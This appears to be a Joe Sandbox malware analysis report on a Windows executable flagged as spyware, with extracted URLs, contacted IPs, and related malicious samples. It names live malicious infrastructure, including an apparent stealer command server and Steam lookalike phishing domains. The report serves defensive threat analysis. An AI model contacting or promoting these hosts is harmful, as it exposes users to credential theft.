00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://recaptcha.net/recaptcha/;12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://steamcommunity.com/discussions/12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.ico12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/stats/12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://medal.tv12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://broadcast.st.dl.eccdnx.com12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/:w12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://pupmeholk.bet:443/pLoska12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265772430.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://x1.c.lencr.org/012Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://x1.i.lencr.org/012Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          104.21.32.1
                                                                                                                                                                                                          		pupmeholk.betUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          23.192.247.89
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                          104.73.234.102
                                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                                          		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                          149.154.167.99
                                                                                                                                                                                                          		t.meUnited Kingdom
                                                                                                                                                                                                          		62041TELEGRAMRUfalse

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                          Analysis ID:1640127
                                                                                                                                                                                                          Start date and time:2025-03-17 01:03:17 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 4m 5s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:12Kp1xbcjv.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:7f8f887f8ab952b0128bb681e61e9c524938d1138c3234d12d49d62e03df16cd.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.spyw.evad.winEXE@1/0@13/4
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          20:04:12API Interceptor8x Sleep call for process: 12Kp1xbcjv.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          104.21.32.1SHIPPING DETAILS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.auto-total.info/3lc9/
                                                                                                                                                                                                          arGdXDmyGJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.rbopisalive.cyou/a669/
                                                                                                                                                                                                          2rvyZc27tz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.kdrqcyusevx.info/k7wl/
                                                                                                                                                                                                          Final PayStub.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.oddsideodylicoopod.cloud/g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=iHr8ZanSEmppv2NUfEI3Sn+a6zMFeevffxq5V5At5Kf3VZBf0vxOCE6EQW7iEjpklZqKgy7LQg==
                                                                                                                                                                                                          JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                          • touxzw.ir/sccc/five/fre.php
                                                                                                                                                                                                          DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.rbopisalive.cyou/2dxw/
                                                                                                                                                                                                          MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.newanthoperso.shop/lqfq/
                                                                                                                                                                                                          Payment Invoice ref0306252.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.rbopisalive.cyou/a669/
                                                                                                                                                                                                          DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.rbopisalive.cyou/2dxw/
                                                                                                                                                                                                          RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.kdrqcyusevx.info/k7wl/
                                                                                                                                                                                                          23.192.247.89InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              installer_ver12.22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  crypted.7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    l9543.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      j21Hq7C.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        https://staemcommunuttly.com/gift/activation=Dor5Fhnm1wGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              104.73.234.102nvtowadkthjawdr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                LauncherV9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        https://sreqmcoommnunlty.com/bysre/tytik/polsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://staemcommunuttly.com/gift/activation=Dor5Fhnm1wGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            Spacey Sun 11.12.411.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                random(8).exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  pupmeholk.bet2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                                                  Spoofer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.RATX-gen.3254.10881.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.112.1
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.112.1
                                                                                                                                                                                                                                                  kuly.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.32.1
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  LauncherV9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  installsbot.crypt.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.80.1
                                                                                                                                                                                                                                                  t.meFNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Install.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  ShadowOF-Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  bpyisefjjthawdtr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  steamcommunity.com2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  Spoofer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.RATX-gen.3254.10881.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  Gnome app1002.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  kuly.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  nvtowadkthjawdr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.73.234.102
                                                                                                                                                                                                                                                  wjthujawdrg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.197.127.21

                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  TELEGRAMRUFNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  Crack2025.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  M6gQuZPvgY.exeGet hashmaliciousAmadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  SecuriteInfo.com.Python.Agent-ACY.11661.1637.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  system.dll.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  r.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  AKAMAI-ASUSsolo-leveling-arise-0-45.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                                                  • 2.16.202.97
                                                                                                                                                                                                                                                  theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                                                  • 2.23.77.188
                                                                                                                                                                                                                                                  MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 2.16.185.191
                                                                                                                                                                                                                                                  MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.199.214.10
                                                                                                                                                                                                                                                  test2.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                  • 92.123.20.9
